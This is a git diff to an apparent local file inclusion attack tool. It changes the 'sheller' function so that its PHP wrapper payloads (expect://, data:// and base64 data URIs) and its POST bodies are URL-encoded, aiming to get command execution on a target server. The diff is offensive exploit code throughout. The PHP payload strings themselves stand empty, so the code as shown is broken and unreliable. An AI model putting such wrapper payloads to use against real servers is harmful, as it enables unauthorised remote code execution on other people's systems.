diff --git a/core/methods/attack.py b/core/methods/attack.py index 28fd119..d14cbb0 100644 --- a/core/methods/attack.py +++ b/core/methods/attack.py @@ -48,7 +48,7 @@ from core.methods.notify import notify from core.methods.error import ShellPopException -from urllib.parse import unquote +from urllib.parse import unquote, quote global maxlen maxlen = len(max(payloadlist, key=len)) @@ -1117,23 +1117,29 @@ def sheller( nullbyte_used = "" if nullist: nullbyte_used = nullist[0] + systemp = ''.format(PAYLOAD) + execp = ''.format(PAYLOAD) + passp = ''.format(PAYLOAD) wrappersPart1 = [ - 'expect://{}'.format(PAYLOAD), - 'data://text/plain,'.format(PAYLOAD), - 'data://text/plain,'.format(PAYLOAD), - 'data://text/plain,'.format(PAYLOAD), - 'data://text/plain;base64,' + encode64( - ''.format(PAYLOAD) + 'expect://{}'.format(quote(PAYLOAD)), + 'data://text/plain,{}'.format( + quote(systemp), ), - 'data://text/plain;base64,' + encode64( - ''.format(PAYLOAD) + 'data://text/plain,{}'.format( + quote(execp), + ), + 'data://text/plain,{}'.format( + quote(passp), ), - 'data://text/plain;base64,' + encode64( + 'data://text/plain;base64,' + quote(encode64( + ''.format(PAYLOAD) + )), + 'data://text/plain;base64,' + quote(encode64( + ''.format(PAYLOAD) + )), + 'data://text/plain;base64,' + quote(encode64( ''.format(PAYLOAD) - ) + )), ] namesPart1 = [ @@ -1234,7 +1240,7 @@ def sheller( req = requests.Request( method="POST", url=url + cont, - data=payloads[i] + data=quote(payloads[i]) ) prep = s.prepare_request(req) elif attack == 3: @@ -1242,7 +1248,7 @@ def sheller( req = requests.Request( method="POST", url=url + cont, - data=payloads[i] + data=quote(payloads[i]) ) prep = s.prepare_request(req) else: